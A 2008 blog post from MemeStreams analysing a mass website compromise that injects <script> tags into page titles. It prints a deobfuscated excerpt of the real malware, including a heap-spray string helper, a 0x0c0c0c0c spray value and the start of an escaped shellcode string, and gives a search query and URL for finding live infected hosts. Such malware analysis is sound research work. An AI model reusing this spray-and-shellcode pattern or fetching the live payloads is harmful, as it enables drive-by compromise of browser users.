
MemeStreams Discussion



This page contains all of the posts and discussion on MemeStreams referencing the following web page: JavaScript from Mass Compromise. You can find discussions on MemeStreams as you surf the web, even if you aren't a MemeStreams member, using the Threads Bookmarklet.

JavaScript from Mass Compromise
by Acidus at 2:19 pm EDT, Mar 13, 2008

McAfee is talking about a massive website compromise that's using JavaScript to drop malware. The attacker(s) are injecting <script> tags into the title of the pages. McAfee researchers are jackholes who don't want to share the wealth and thus don't provide any links or insight into the code.

However, based on the vector the attackers are using (injecting into the <title> tag), the simple Google query intitle: <script src=http will show you the sites that are infected and where you can fetch code. Some of the websites serving the malware require you to spoof a Referer header to receive the actual malware. Here is one example after a quick pass through a JavaScript analyzer.

http://b.njnk.net:80/E/J.JS

// Script-wide state. Several string values are assembled from concatenated
// fragments, so the full value never appears as a single literal in the source
// (presumably to defeat simple string matching -- confirm against other samples).
// Most of these names are not referenced in the visible part of the listing;
// a role is stated below only where a visible line establishes it.
var z1IlbQFl0X = 0; // flag tested by the two bare blocks that follow; 0 leaves them inert
var z1IlaxFl0X = 0;
var z1IlbPFl0X = 1;
var z1IlbiFl0X = 0;
var z1IlbCFl0X = 0;
var z1IlbHFl0X = 0;
var z1IlbIFl0X = 0;
var z1IlbfFl0X = "use" + "rid1" + "AF9122"; // evaluates to "userid1AF9122"
var z1IlbcFl0X = "20";
var z1IlaoFl0X = "a.n" + "jnk." + "net"; // evaluates to "a.njnk.net" (this file itself was served from b.njnk.net)
var z1IlbGFl0X = 0, z1IlbzFl0X = 0, z1IlaHFl0X = 0;
var z1IlaAFl0X = "";
var z1IlanFl0X = 0;
var z1IlapFl0X = 0, z1IlaOFl0X = 0, z1IlaKFl0X = 0, z1IlaLFl0X = 0;
var z1IlamFl0X = "n" + "one"; // evaluates to "none"
var z1IlcqFl0X;
var z1IlaSFl0X = 0; // checked at the top of z1IltFl0X(), which returns at once when this is > 0
// Two bare blocks gated on z1IlbQFl0X, which is initialised to 0, so neither
// body runs as shipped. They look like leftover debug output (assumption).
// z1IlcFFl0X is not declared anywhere in the visible listing.
{
    if(z1IlbQFl0X) {
        // Would append z1IlcFFl0X followed by "<br>" to the first <body> element.
        document.getElementsByTagName("bod" + "y") [ 0] .innerHTML += z1IlcFFl0X + "<b" + "r>";
        
    }
}
{
    if(z1IlbQFl0X) {
        // Would show the same value in an alert dialog.
        alert(z1IlcFFl0X);
        
    }
}
/**
 * Cookie reader: looks up `name` in document.cookie and returns its value.
 *
 * @param name cookie name to look for
 * @returns the unescape()d cookie value, or null when document.cookie is
 *          empty or no cookie with that exact name is found
 */
function x0r1aU2Z(name) {
    var z1IlaFFl0X = document.cookie;
    var z1IlaJFl0X = name + "=";
    if(! z1IlaFFl0X) {
        return null;
        
    }
    // First look for "; name=", i.e. the cookie anywhere after the first entry.
    var z1IlaDFl0X = z1IlaFFl0X.indexOf("; " + z1IlaJFl0X);
    if(z1IlaDFl0X == - 1) {
        // Otherwise accept "name=" only at position 0; a match elsewhere would be
        // the tail of a different, longer cookie name.
        z1IlaDFl0X = z1IlaFFl0X.indexOf(z1IlaJFl0X);
        if(z1IlaDFl0X != 0) {
            return null;
            
        }
    }
    else {
        // Skip the "; " separator so the index points at the name itself.
        z1IlaDFl0X += 2;
        
    }
    // End of the value is the next ";" or, failing that, the end of the string.
    // Note this re-reads document.cookie rather than using the cached copy.
    var z1IlbqFl0X = document.cookie.indexOf(";", z1IlaDFl0X);
    if(z1IlbqFl0X == - 1) {
        z1IlbqFl0X = z1IlaFFl0X.length;
        
    }
    return unescape(z1IlaFFl0X.substring(z1IlaDFl0X + z1IlaJFl0X.length, z1IlbqFl0X));
    
};
/**
 * Cookie writer: stores `value` under `name` with an expiry 365 days ahead.
 *
 * The cookie string carries only the name, the escape()d value and an
 * "expires" attribute; no path or domain attribute is set here.
 * How the caller uses this cookie is not visible in the listing
 * (NOTE(review): presumably a per-visitor marker -- confirm in the full sample).
 *
 * @param name  cookie name
 * @param value cookie value, passed through escape() before being stored
 */
function x0r1aR2Z(name, value) {
    var exp = new Date();
    // Now plus 365 days, in milliseconds.
    var z1IlbVFl0X = exp.getTime() + (365 * 1 * 24 * 60 * 60 * 1000);
    exp.setTime(z1IlbVFl0X);
    // "expires" is split into fragments like the other string literals in this file.
    var z1IlbYFl0X = name + "=" + escape(value) + "; e" + "xpires" + "=" + exp.toGMTString();
    document.cookie = z1IlbYFl0X;
    
};
/**
 * String-growing helper: repeats the first argument by doubling, then cuts
 * the result to (second argument / 2) characters and returns it.
 *
 * NOTE(review): the halving suggests the second argument is a size in bytes
 * and each string character is counted as two bytes -- confirm against the
 * caller, which lies in the truncated part of the listing. Helpers of this
 * shape commonly build the large filler strings seen in browser memory-spray
 * stagers, which makes the function a useful marker when triaging variants.
 *
 * An empty first argument would make the loop spin forever for any positive
 * target, since doubling an empty string never increases its length.
 *
 * @param z1IlakFl0X seed string to repeat
 * @param z1IlalFl0X target size; the returned string has half this many characters
 * @returns the repeated and truncated string
 */
function x0r1ax2Z(z1IlakFl0X, z1IlalFl0X) {
    // Double until the string is at least target/2 characters long.
    while(z1IlakFl0X.length * 2 < z1IlalFl0X) {
        z1IlakFl0X += z1IlakFl0X;
        
    }
    // Trim the overshoot so the length is exactly target/2.
    z1IlakFl0X = z1IlakFl0X.substring(0, z1IlalFl0X / 2);
    return z1IlakFl0X;
    
};
function z1IltFl0X() {
    if(z1IlaSFl0X > 0) {
        return;
        
    }
    try {
        var z1IlbaFl0X = 0 x0c0c0c0c;
        var z1IlarFl0X = unescape("%" + "ueb55㍮%" + "u64c" + ... [ Read More (3.0k in body) ]

 
 